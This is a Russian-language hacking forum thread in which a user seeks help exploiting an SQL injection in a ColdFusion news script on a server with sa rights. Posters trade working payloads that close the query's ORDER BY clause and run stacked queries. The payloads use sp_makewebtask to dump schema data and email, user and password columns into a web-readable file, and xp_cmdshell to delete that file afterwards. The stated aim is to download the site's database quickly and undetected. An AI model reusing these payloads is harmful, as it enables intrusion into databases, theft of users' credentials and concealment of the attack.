Всем привет! подскажите как закрыть 'Order' инъекция в cfm скрипте,все таблицы ,колонки и т.д даёт нормально,права sa хочу вывести таблицу в файл на сервере с помощью sp_makewebtask, в вебдиректорию в сообщение о ошибке есть полный путь до вебдиры,и запрос к бд Code: site.com/dir/news.cfm?news_id=-1' Code: [Macromedia][SQLServer JDBC Driver][SQLServer]Line 2: Incorrect syntax near ''. The error occurred in F:\www\site.com\www\dir\news.cfm: line 19 SQL SELECT * From News Where News_ID = -1'' Order By DisplayOrder делаю запрос Code: http://site.com/dir/news.cfm?News_ID=1;%20EXEC%20master..sp_makewebtask%20%22F:\www\site.com\www\dir\output.html%22,%20%22SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES%22 Code: [Macromedia][SQLServer JDBC Driver][SQLServer]Incorrect syntax near the keyword 'Order'. The error occurred in F:\www\site.com\www\dir\news.cfm: line 19 SELECT * From News Where News_ID = 1; EXEC master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES" Order By DisplayOrder как закрыть этот ордер? повсякому пробовал пока неполучилось, проверяю потом site.com/dir/output.html нету файла
пробовал запрос становится вида [Macromedia][SQLServer JDBC Driver][SQLServer]Line 2: Incorrect syntax near ''. Code: SELECT * From News Where News_ID = 1; EXEC master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"-- Order By DisplayOrder в файл невыводит
Фильтрация кавычек там, читай статью [cash] до конца и все последующие посты! https://forum.antichat.ru/thread30501.html здесь непосредственно про обход кавычек https://forum.antichat.ru/threadnav30501-3-10.html
да всё прикрасно выводит и версию и всю нужную инфу из базы, там просто база объёмная т.е много инфы нужно скачать, я даж таблицу создал и там две колонки первая id вторая вся нужная мне инфа но скрипт который построчно сливает долго сливает всёравно(там сервак немного тормозной), я хочу побыстрей всё скачать просто ,но немогу правильно заюзать sp_makewebtask, раньше пробовал на других серверах всё получалось, а тут запрос каварный какой-то несоображу как ордер закрыть
поробуй сделать "фейковый" запрос тогда запрос у тебя будет типа такого: Code: News_ID = 1; EXEC master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"; SELECT * From News Where News_ID = 1 а Order By DisplayOrder скрипт сам подставит и ошибки не будет
Scipio Огромнейшее спасибо и как я сам недогодался!!!! а как потом файл жахнуть на сервере? через xp_cmdshell ?
можеш неотвечать разобрался как удалить файл который вывел Code: 1;+exec+master..xp_cmdshell+"del+F:\www\site.com\www\dir\output.html";SELECT%20*%20From%20News%20Where%20News_ID%20=%201
Вопрос:вот допустим мне нужно не дампить всю таблицу а вывести в файл только нужные колонки email user pass делаю запрос http://site.com/dir/news.cfm?News_ID=1; exec master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT email,user,pass from User" в файл выводится но значения ОБРЕЗАЮТСЯ по 20 символов и всё т.е некоторые данные такие как email например обрезанные получаются пробовал так зделать 1; exec master..sp_makewebtask "F:\www\site.com\www\dir\output.html", "SELECT email as (50),user as (50),pass as (50) from User" говорит The identifier that starts with 'querry'is too long. Maximum length is 128. cast(email as nvarchar(50)) так тоже пробовал и тотже is too long. Maximum length is 128 и ещё sp_makewebtask сохраняет в виде html таблицы т.е там теги нтмл и нужные данные, если базу большого объёма так сдампить то весить файл будет очень много может знает кто как без тегов нтмл вывести если вообще так можно конечно просто разделить данные например ":" чтоб в файл выводилось userass:email ?
